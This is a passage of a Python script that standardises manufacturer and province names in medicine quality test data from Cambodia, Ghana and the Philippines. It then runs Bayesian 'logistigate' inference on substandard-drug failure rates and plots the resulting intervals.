(MQD_df_CAM.Manufacturer == 'PHARMASANT LABORATORIES Co.,LTD') | (MQD_df_CAM.Manufacturer == 'Pharmasant Laboratories Co., Ltd'),
'Manufacturer'] = 'Pharmasant Laboratories Co., Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Plethico Pharmaceuticals, Ltd')
| (MQD_df_CAM.Manufacturer == 'Plethico Pharmaceuticals Ltd')
| (MQD_df_CAM.Manufacturer == 'Plethico Pharmaceutical Ltd')
| (MQD_df_CAM.Manufacturer == 'Plethico'),
'Manufacturer'] = 'Plethico'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'PPM Laboratory') | (MQD_df_CAM.Manufacturer == 'PPM')
| (MQD_df_CAM.Manufacturer == 'Pharma Product Manufacturing'),
'Manufacturer'] = 'PPM'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Ranbaxy Laboratories Limited.')
| (MQD_df_CAM.Manufacturer == 'Ranbaxy Pharmaceuticals'),
'Manufacturer'] = 'Ranbaxy Pharmaceuticals'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Shijiazhuang Pharma Group Zhongnuo Pharmaceutical [Shijiazhuang] Co.,LTD')
| (MQD_df_CAM.Manufacturer == 'Shijiazhuang Pharmaceutical Group Ltd'),
'Manufacturer'] = 'Shijiazhuang Pharmaceutical Group Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Sanofi-Aventis Vietnam') | (MQD_df_CAM.Manufacturer == 'Sanofi Aventis'),
'Manufacturer'] = 'Sanofi Aventis'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Stada Vietnam Joint Venture Co., Ltd.') | (MQD_df_CAM.Manufacturer == 'Stada Vietnam Joint Venture'),
'Manufacturer'] = 'Stada Vietnam Joint Venture'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Shandong Reyoung Pharmaceutical Co., Ltd') | (
MQD_df_CAM.Manufacturer == 'Shandong Reyoung Pharmaceuticals Ltd'),
'Manufacturer'] = 'Shandong Reyoung Pharmaceuticals Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'T Man Pharma Ltd. Part.')
| (MQD_df_CAM.Manufacturer == 'T-MAN Pharma Ltd., Part')
| (MQD_df_CAM.Manufacturer == 'T-Man Pharmaceuticals Ltd'),
'Manufacturer'] = 'T-Man Pharmaceuticals Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Umedica Laboratories PVT. LTD.')
| (MQD_df_CAM.Manufacturer == 'Umedica Laboratories PVT. Ltd')
| (MQD_df_CAM.Manufacturer == 'Umedica Laboratories Pvt Ltd')
| (MQD_df_CAM.Manufacturer == 'Umedica'),
'Manufacturer'] = 'Umedica'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Utopian Co,.LTD') | (MQD_df_CAM.Manufacturer == 'Utopian Co., Ltd')
| (MQD_df_CAM.Manufacturer == 'Utopian Company Ltd'),
'Manufacturer'] = 'Utopian Company Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Vesco Pharmaceutical Ltd.,Part')
| (MQD_df_CAM.Manufacturer == 'Vesco Pharmaceutical Ltd Part'),
'Manufacturer'] = 'Vesco Pharmaceutical Ltd Part'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Yanzhou Xier Kangtai Pharmaceutical Co., Ltd')
| (MQD_df_CAM.Manufacturer == 'Yanzhou Xier Kangtai Pharm'),
'Manufacturer'] = 'Yanzhou Xier Kangtai Pharm'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Zhangjiakou DongFang pharmaceutical Co., Ltd')
| (MQD_df_CAM.Manufacturer == 'Zhangjiakou Dongfang Phamaceutical'),
'Manufacturer'] = 'Zhangjiakou Dongfang Phamaceutical'
# Ghana
# Province
MQD_df_GHA.loc[
(MQD_df_GHA.Province == 'Northern') | (MQD_df_GHA.Province == 'Northern Region')
| (MQD_df_GHA.Province == 'Northern Region, Northern Region'),
'Province'] = 'Northern'
MQD_df_GHA.loc[
(MQD_df_GHA.Province == 'Western (Ghana)'),
'Province'] = 'Western'
# Manufacturer
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Ajanta Pharma Ltd') | (MQD_df_GHA.Manufacturer == 'Ajanta Pharma Ltd.'),
'Manufacturer'] = 'Ajanta Pharma Ltd.'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Ally Pharma Options Pvt Ltd.') | (MQD_df_GHA.Manufacturer == 'Ally Pharma Options Pvt. Ltd'),
'Manufacturer'] = 'Ally Pharma Options Pvt. Ltd'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Bliss GVS Pharma Ltd') | (MQD_df_GHA.Manufacturer == 'Bliss GVS Pharmaceuticals Ltd.'),
'Manufacturer'] = 'Bliss GVS Pharma Ltd'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Cipla Ltd. India') | (MQD_df_GHA.Manufacturer == 'Cipla Ltd'),
'Manufacturer'] = 'Cipla Ltd'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Danadams Pharmaceutical Industry Limited')
| (MQD_df_GHA.Manufacturer == 'Danadams Pharmaceutical Industry, Ltd.')
| (MQD_df_GHA.Manufacturer == 'Danadams Pharmaceuticals Industry Limited'),
'Manufacturer'] = 'Danadams'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Guilin Pharmaceutical Company Ltd.')
| (MQD_df_GHA.Manufacturer == 'Guilin Pharmaceutical Co. Ltd')
| (MQD_df_GHA.Manufacturer == 'Guilin Pharmaceutical Co., Ltd'),
'Manufacturer'] = 'Guilin'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Kinapharma Limited') | (MQD_df_GHA.Manufacturer == 'Kinapharma Ltd'),
'Manufacturer'] = 'Kinapharma'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Maphar Laboratories') | (MQD_df_GHA.Manufacturer == 'Maphar'),
'Manufacturer'] = 'Maphar'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Novartis Pharmaceutical Corporation')
| (MQD_df_GHA.Manufacturer == 'Novartis Pharmaceuticals Corporation'),
'Manufacturer'] = 'Novartis'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Pharmanova Limited')
| (MQD_df_GHA.Manufacturer == 'Pharmanova Ltd'),
'Manufacturer'] = 'Pharmanova'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Phyto-Riker (Gihoc) Pharmaceuticals Ltd')
| (MQD_df_GHA.Manufacturer == 'Phyto-Riker (Gihoc) Pharmaceuticals, Ltd.'),
'Manufacturer'] = 'Phyto-Riker'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Ronak Exim PVT. Ltd')
| (MQD_df_GHA.Manufacturer == 'Ronak Exim Pvt Ltd'),
'Manufacturer'] = 'Ronak Exim'
# Philippines
# Province
MQD_df_PHI.loc[(MQD_df_PHI.Province == 'CALABARZON'), 'Province'] = 'Calabarzon'
MQD_df_PHI.loc[(MQD_df_PHI.Province == 'region 1 '), 'Province'] = 'Region 1'
MQD_df_PHI.loc[(MQD_df_PHI.Province == 'region7'), 'Province'] = 'Region 7'
MQD_df_PHI.loc[(MQD_df_PHI.Province == 'region9'), 'Province'] = 'Region 9'
# Manufacturer
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'AM-Europharma')
| (MQD_df_PHI.Manufacturer == 'Am-Euro Pharma Corporation'),
'Manufacturer'] = 'AM-Europharma'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Amherst Laboratories Inc')
| (MQD_df_PHI.Manufacturer == 'Amherst Laboratories Inc.')
| (MQD_df_PHI.Manufacturer == 'Amherst Laboratories, Inc.'),
'Manufacturer'] = 'Amherst'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Biotech Research Lab Inc.')
| (MQD_df_PHI.Manufacturer == 'BRLI'),
'Manufacturer'] = 'BRLI'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Compact Pharmaceutical Corp')
| (MQD_df_PHI.Manufacturer == 'Compact Pharmaceutical Corp.')
| (MQD_df_PHI.Manufacturer == 'Compact Pharmaceutical Corporation'),
'Manufacturer'] = 'Compact'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Diamond Laboratorie, Inc. ')
| (MQD_df_PHI.Manufacturer == 'Diamond Laboratories, Inc.'),
'Manufacturer'] = 'Diamond'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Drugmakers Biotech Research Laboratories, Inc.')
| (MQD_df_PHI.Manufacturer == 'Drugmakers Laboratories Inc')
| (MQD_df_PHI.Manufacturer == 'Drugmakers Laboratories Inc.')
| (MQD_df_PHI.Manufacturer == 'Drugmakers Laboratories, Inc.'),
'Manufacturer'] = 'Drugmakers'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Flamingo Pharmaceuticals Ltd')
| (MQD_df_PHI.Manufacturer == 'Flamingo Pharmaceuticals Ltd.')
| (MQD_df_PHI.Manufacturer == 'Flamingo Pharmaceuticals, Ltd.'),
'Manufacturer'] = 'Flamingo'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Interphil Laboratories')
| (MQD_df_PHI.Manufacturer == 'Interphil Laboratories, Inc.')
| (MQD_df_PHI.Manufacturer == 'Interphil Laboratories,Inc'),
'Manufacturer'] = 'Interphil'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'J.M. Tolman Laboratories, Inc.')
| (MQD_df_PHI.Manufacturer == 'J.M. Tolmann Lab. Inc.')
| (MQD_df_PHI.Manufacturer == 'J.M. Tolmann Laboratories, Inc.')
| (MQD_df_PHI.Manufacturer == 'J.M.Tollman Laboratories Inc.')
| (MQD_df_PHI.Manufacturer == 'J.M.Tolmann Laboratories Inc')
| (MQD_df_PHI.Manufacturer == 'J.M.Tolmann Laboratories Inc.')
| (MQD_df_PHI.Manufacturer == 'Tolmann'),
'Manufacturer'] = 'J.M. Tolmann'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Lloyd Laboratories Inc')
| (MQD_df_PHI.Manufacturer == 'Lloyd Laboratories Inc.')
| (MQD_df_PHI.Manufacturer == 'Lloyd Laboratories, Inc.'),
'Manufacturer'] = 'Lloyd'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Lumar Pharmaceutical Lab')
| (MQD_df_PHI.Manufacturer == 'Lumar Pharmaceutical Lab. ')
| (MQD_df_PHI.Manufacturer == 'Lumar Pharmaceutical Laboratory'),
'Manufacturer'] = 'Lumar'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Lupin Limited') | (MQD_df_PHI.Manufacturer == 'Lupin Ltd')
| (MQD_df_PHI.Manufacturer == 'Lupin Ltd.'),
'Manufacturer'] = 'Lupin'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Missing') | (MQD_df_PHI.Manufacturer == 'No Information Available')
| (MQD_df_PHI.Manufacturer == 'No information'),
'Manufacturer'] = 'Unknown'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Natrapharm') | (MQD_df_PHI.Manufacturer == 'Natrapharm Inc.')
| (MQD_df_PHI.Manufacturer == 'Natrapharm, Inc.'),
'Manufacturer'] = 'Natrapharm'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'New Myrex Lab., Inc.') | (MQD_df_PHI.Manufacturer == 'New Myrex Laboratories Inc')
| (MQD_df_PHI.Manufacturer == 'New Myrex Laboratories Inc.')
| (MQD_df_PHI.Manufacturer == 'New Myrex Laboratories, Inc.'),
'Manufacturer'] = 'New Myrex'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Novartis (Bangladesh)') | (MQD_df_PHI.Manufacturer == 'Novartis (Bangladesh) Ltd.')
| (MQD_df_PHI.Manufacturer == 'Novartis Bangladesh Ltd')
| (MQD_df_PHI.Manufacturer == 'Novartis Bangladesh Ltd.')
| (MQD_df_PHI.Manufacturer == 'Novartis'),
'Manufacturer'] = 'Novartis'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Pascual Lab. Inc.')
| (MQD_df_PHI.Manufacturer == 'Pascual Laboratories, Inc.'),
'Manufacturer'] = 'Pascual'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Pharex Health Corp.')
| (MQD_df_PHI.Manufacturer == 'Pharex'),
'Manufacturer'] = 'Pharex'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Plethico Pharmaceutical Ltd.')
| (MQD_df_PHI.Manufacturer == 'Plethico Pharmaceuticals, Ltd.'),
'Manufacturer'] = 'Plethico'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'San Marino Lab., Corp.')
| (MQD_df_PHI.Manufacturer == 'San Marino Laboratories Corp'),
'Manufacturer'] = 'San Marino'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Sandoz South Africa Ltd.')
| (MQD_df_PHI.Manufacturer == 'Sandoz Private Ltd.')
| (MQD_df_PHI.Manufacturer == 'Sandoz Philippines Corp.')
| (MQD_df_PHI.Manufacturer == 'Sandoz GmbH')
| (MQD_df_PHI.Manufacturer == 'Sandoz'),
'Manufacturer'] = 'Sandoz'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Scheele Laboratories Phil., Inc.')
| (MQD_df_PHI.Manufacturer == 'Scheele Laboratories Phils, Inc.')
| (MQD_df_PHI.Manufacturer == 'Scheele Laboratories Phis., Inc.')
| (MQD_df_PHI.Manufacturer == 'Scheele Laboratories Phils, Inc.'),
'Manufacturer'] = 'Scheele'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'The Generics Pharmacy')
| (MQD_df_PHI.Manufacturer == 'The Generics Pharmacy Inc.')
| (MQD_df_PHI.Manufacturer == 'TGP'),
'Manufacturer'] = 'TGP'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Wyeth Pakistan Limited')
| (MQD_df_PHI.Manufacturer == 'Wyeth Pakistan Ltd')
| (MQD_df_PHI.Manufacturer == 'Wyeth Pakistan Ltd.'),
'Manufacturer'] = 'Wyeth'
# Make smaller data frames filtered for facility type and therapeutic indication
# Filter for facility type
MQD_df_CAM_filt = MQD_df_CAM[MQD_df_CAM['Facility Type'].isin(
['Depot of Pharmacy', 'Health Clinic', 'Pharmacy', 'Pharmacy Depot', 'Private Clinic',
'Retail-drug Outlet', 'Retail drug outlet', 'Clinic'])].copy()
MQD_df_GHA_filt = MQD_df_GHA[MQD_df_GHA['Facility Type'].isin(
['Health Clinic', 'Hospital', 'Pharmacy', 'Retail Shop', 'Retail-drug Outlet'])].copy()
MQD_df_PHI_filt = MQD_df_PHI[MQD_df_PHI['Facility Type'].isin(
['Health Center', 'Health Clinic', 'Hospital', 'Hospital Pharmacy', 'Pharmacy',
'Retail-drug Outlet', 'health office'])].copy()
# Now filter by chosen drug types
MQD_df_CAM_antimalarial = MQD_df_CAM_filt[MQD_df_CAM_filt['Therapeutic Indications'].isin(['Antimalarial'])].copy()
MQD_df_GHA_antimalarial = MQD_df_GHA_filt[MQD_df_GHA_filt['Therapeutic Indications'].isin(['Antimalarial',
'Antimalarials'])].copy()
MQD_df_PHI_antituberculosis = MQD_df_PHI_filt[MQD_df_PHI_filt['Therapeutic Indications'].isin(['Anti-tuberculosis',
'Antituberculosis'])].copy()
# For each desired data set, generate lists suitable for use with logistigate
# Overall data
dataTbl_CAM = MQD_df_CAM[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_CAM = [[i[0],i[1],1] if i[2]=='Fail' else [i[0],i[1],0] for i in dataTbl_CAM]
dataTbl_GHA = MQD_df_GHA[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_GHA = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_GHA]
dataTbl_PHI = MQD_df_PHI[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_PHI = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_PHI]
# Filtered data
dataTbl_CAM_filt = MQD_df_CAM_filt[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_CAM_filt = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_CAM_filt]
dataTbl_GHA_filt = MQD_df_GHA_filt[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_GHA_filt = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_GHA_filt]
dataTbl_PHI_filt = MQD_df_PHI_filt[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_PHI_filt = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_PHI_filt]
# Therapeutics data
dataTbl_CAM_antimalarial = MQD_df_CAM_antimalarial[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_CAM_antimalarial = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_CAM_antimalarial]
dataTbl_GHA_antimalarial = MQD_df_GHA_antimalarial[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_GHA_antimalarial = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_GHA_antimalarial]
dataTbl_PHI_antituberculosis = MQD_df_PHI_antituberculosis[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_PHI_antituberculosis = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_PHI_antituberculosis]
# Put the databases and lists into a dictionary
outputDict = {}
outputDict.update({'df_ALL':MQD_df,
'df_CAM':MQD_df_CAM, 'df_GHA':MQD_df_GHA, 'df_PHI':MQD_df_PHI,
'df_CAM_filt':MQD_df_CAM_filt, 'df_GHA_filt':MQD_df_GHA_filt, 'df_PHI_filt':MQD_df_PHI_filt,
'df_CAM_antimalarial':MQD_df_CAM_antimalarial, 'df_GHA_antimalarial':MQD_df_GHA_antimalarial,
'df_PHI_antituberculosis':MQD_df_PHI_antituberculosis,
'dataTbl_CAM':dataTbl_CAM, 'dataTbl_GHA':dataTbl_GHA, 'dataTbl_PHI':dataTbl_PHI,
'dataTbl_CAM_filt':dataTbl_CAM_filt, 'dataTbl_GHA_filt':dataTbl_GHA_filt,
'dataTbl_PHI_filt':dataTbl_PHI_filt, 'dataTbl_CAM_antimalarial':dataTbl_CAM_antimalarial,
'dataTbl_GHA_antimalarial':dataTbl_GHA_antimalarial,
'dataTbl_PHI_antituberculosis':dataTbl_PHI_antituberculosis})
return outputDict
def MQDdataScript():
'''Script looking at the MQD data'''
import scipy.special as sps
import numpy as np
MCMCdict = {'MCMCtype': 'NUTS', 'Madapt': 5000, 'delta': 0.4}
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, '../logistigate', 'exmples', 'data')))
# Grab processed data tables
dataDict = cleanMQD()
# Run with Country as outlets
dataTblDict = util.testresultsfiletotable('MQDfiles/MQD_TRIMMED1')
dataTblDict.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(0.038)),
'MCMCdict': MCMCdict})
logistigateDict = lg.runlogistigate(dataTblDict)
util.plotPostSamples(logistigateDict)
util.printEstimates(logistigateDict)
# Run with Country-Province as outlets
dataTblDict2 = util.testresultsfiletotable('MQDfiles/MQD_TRIMMED2.csv')
dataTblDict2.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(0.038)),
'MCMCdict': MCMCdict})
logistigateDict2 = lg.runlogistigate(dataTblDict2)
util.plotPostSamples(logistigateDict2)
util.printEstimates(logistigateDict2)
# Run with Cambodia provinces
dataTblDict_CAM = util.testresultsfiletotable(dataDict['dataTbl_CAM'], csvName=False)
countryMean = np.sum(dataTblDict_CAM['Y']) / np.sum(dataTblDict_CAM['N'])
dataTblDict_CAM.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_CAM = lg.runlogistigate(dataTblDict_CAM)
numCamImps_fourth = int(np.floor(logistigateDict_CAM['importerNum'] / 4))
util.plotPostSamples(logistigateDict_CAM, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth).tolist(),
subTitleStr=['\nCambodia - 1st Quarter', '\nCambodia'])
util.plotPostSamples(logistigateDict_CAM, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth,numCamImps_fourth*2).tolist(),
subTitleStr=['\nCambodia - 2nd Quarter', '\nCambodia'])
util.plotPostSamples(logistigateDict_CAM, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth * 2, numCamImps_fourth * 3).tolist(),
subTitleStr=['\nCambodia - 3rd Quarter', '\nCambodia'])
util.plotPostSamples(logistigateDict_CAM, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth * 3, numCamImps_fourth * 4).tolist(),
subTitleStr=['\nCambodia - 4th Quarter', '\nCambodia'])
util.printEstimates(logistigateDict_CAM)
# Plot importers subset where median sample is above 0.4
totalEntities = logistigateDict_CAM['importerNum'] + logistigateDict_CAM['outletNum']
sampMedians = [np.median(logistigateDict_CAM['postSamples'][:,i]) for i in range(totalEntities)]
highImporterInds = [i for i, x in enumerate(sampMedians[:logistigateDict_CAM['importerNum']]) if x > 0.4]
util.plotPostSamples(logistigateDict_CAM, importerIndsSubset=highImporterInds,subTitleStr=['\nCambodia - Subset','\nCambodia'])
util.printEstimates(logistigateDict_CAM, importerIndsSubset=highImporterInds)
# Run with Cambodia provinces filtered for outlet-type samples
dataTblDict_CAM_filt = util.testresultsfiletotable(dataDict['dataTbl_CAM_filt'], csvName=False)
#dataTblDict_CAM_filt = util.testresultsfiletotable('MQDfiles/MQD_CAMBODIA_FACILITYFILTER.csv')
countryMean = np.sum(dataTblDict_CAM_filt['Y']) / np.sum(dataTblDict_CAM_filt['N'])
dataTblDict_CAM_filt.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_CAM_filt = lg.runlogistigate(dataTblDict_CAM_filt)
numCamImps_fourth = int(np.floor(logistigateDict_CAM_filt['importerNum'] / 4))
util.plotPostSamples(logistigateDict_CAM_filt, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth).tolist(),
subTitleStr=['\nCambodia (filtered) - 1st Quarter', '\nCambodia (filtered)'])
util.plotPostSamples(logistigateDict_CAM_filt, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth, numCamImps_fourth * 2).tolist(),
subTitleStr=['\nCambodia (filtered) - 2nd Quarter', '\nCambodia (filtered)'])
util.plotPostSamples(logistigateDict_CAM_filt, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth * 2, numCamImps_fourth * 3).tolist(),
subTitleStr=['\nCambodia (filtered) - 3rd Quarter', '\nCambodia (filtered)'])
util.plotPostSamples(logistigateDict_CAM_filt, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth * 3, logistigateDict_CAM_filt['importerNum']).tolist(),
subTitleStr=['\nCambodia (filtered) - 4th Quarter', '\nCambodia (filtered)'])
# Run with Cambodia provinces filtered for antibiotics
dataTblDict_CAM_antibiotic = util.testresultsfiletotable('MQDfiles/MQD_CAMBODIA_ANTIBIOTIC.csv')
countryMean = np.sum(dataTblDict_CAM_antibiotic['Y']) / np.sum(dataTblDict_CAM_antibiotic['N'])
dataTblDict_CAM_antibiotic.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_CAM_antibiotic = lg.runlogistigate(dataTblDict_CAM_antibiotic)
numCamImps_third = int(np.floor(logistigateDict_CAM_antibiotic['importerNum'] / 3))
util.plotPostSamples(logistigateDict_CAM_antibiotic, plotType='int90',
importerIndsSubset=np.arange(numCamImps_third).tolist(),
subTitleStr=['\nCambodia - 1st Third (Antibiotics)', '\nCambodia (Antibiotics)'])
util.plotPostSamples(logistigateDict_CAM_antibiotic, plotType='int90',
importerIndsSubset=np.arange(numCamImps_third, numCamImps_third * 2).tolist(),
subTitleStr=['\nCambodia - 2nd Third (Antibiotics)', '\nCambodia (Antibiotics)'])
util.plotPostSamples(logistigateDict_CAM_antibiotic, plotType='int90',
importerIndsSubset=np.arange(numCamImps_third * 2, logistigateDict_CAM_antibiotic['importerNum']).tolist(),
subTitleStr=['\nCambodia - 3rd Third (Antibiotics)', '\nCambodia (Antibiotics)'])
util.printEstimates(logistigateDict_CAM_antibiotic)
# Run with Cambodia provinces filtered for antimalarials
dataTblDict_CAM_antimalarial = util.testresultsfiletotable(dataDict['dataTbl_CAM_antimalarial'], csvName=False)
countryMean = np.sum(dataTblDict_CAM_antimalarial['Y']) / np.sum(dataTblDict_CAM_antimalarial['N'])
dataTblDict_CAM_antimalarial.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_CAM_antimalarial = lg.runlogistigate(dataTblDict_CAM_antimalarial)
#numCamImps_half = int(np.floor(logistigateDict_CAM_antimalarial['importerNum'] / 2))
#util.plotPostSamples(logistigateDict_CAM_antimalarial, plotType='int90',
# importerIndsSubset=np.arange(numCamImps_half).tolist(),
# subTitleStr=['\nCambodia - 1st Half (Antimalarials)', '\nCambodia (Antimalarials)'])
#util.plotPostSamples(logistigateDict_CAM_antimalarial, plotType='int90',
# importerIndsSubset=np.arange(numCamImps_half,
# logistigateDict_CAM_antimalarial['importerNum']).tolist(),
# subTitleStr=['\nCambodia - 2nd Half (Antimalarials)', '\nCambodia (Antimalarials)'])
# Special plotting for these data sets
numImp, numOut = logistigateDict_CAM_antimalarial['importerNum'], logistigateDict_CAM_antimalarial['outletNum']
lowerQuant, upperQuant = 0.05, 0.95
intStr = '90'
priorSamps = logistigateDict_CAM_antimalarial['prior'].expitrand(5000)
priorLower, priorUpper = np.quantile(priorSamps, lowerQuant), np.quantile(priorSamps, upperQuant)
importerIndsSubset = range(numImp)
impNames = [logistigateDict_CAM_antimalarial['importerNames'][i] for i in importerIndsSubset]
impLowers = [np.quantile(logistigateDict_CAM_antimalarial['postSamples'][:, l], lowerQuant) for l in importerIndsSubset]
impUppers = [np.quantile(logistigateDict_CAM_antimalarial['postSamples'][:, l], upperQuant) for l in importerIndsSubset]
midpoints = [impUppers[i] - (impUppers[i] - impLowers[i]) / 2 for i in range(len(impUppers))]
zippedList = zip(midpoints, impUppers, impLowers, impNames)
sorted_pairs = sorted(zippedList, reverse=True)
impNamesSorted = [tup[3] for tup in sorted_pairs]
impNamesSorted.append('')
impNamesSorted.append('(Prior)')
# Plot
import matplotlib.pyplot as plt
fig, (ax) = plt.subplots(figsize=(10, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='red')
plt.plot((impNamesSorted[-1], impNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(impNamesSorted)), impNamesSorted, rotation=90)
plt.title('Manufacturers - ' + intStr + '% Intervals' + '\nCambodia Antimalarials',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Manufacturer Name', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(9)
fig.tight_layout()
plt.show()
plt.close()
outletIndsSubset = range(numOut)
outNames = [logistigateDict_CAM_antimalarial['outletNames'][i] for i in outletIndsSubset]
outLowers = [np.quantile(logistigateDict_CAM_antimalarial['postSamples'][:, numImp + l], lowerQuant) for l in outletIndsSubset]
outUppers = [np.quantile(logistigateDict_CAM_antimalarial['postSamples'][:, numImp + l], upperQuant) for l in outletIndsSubset]
midpoints = [outUppers[i] - (outUppers[i] - outLowers[i]) / 2 for i in range(len(outUppers))]
zippedList = zip(midpoints, outUppers, outLowers, outNames)
sorted_pairs = sorted(zippedList, reverse=True)
outNamesSorted = [tup[3] for tup in sorted_pairs]
outNamesSorted.append('')
outNamesSorted.append('(Prior)')
# Plot
fig, (ax) = plt.subplots(figsize=(8, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='purple')
plt.plot((outNamesSorted[-1], outNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(outNamesSorted)), outNamesSorted, rotation=90)
plt.title('Regional Aggregates - ' + intStr + '% Intervals' + '\nCambodia Antimalarials',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Regional Aggregate', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
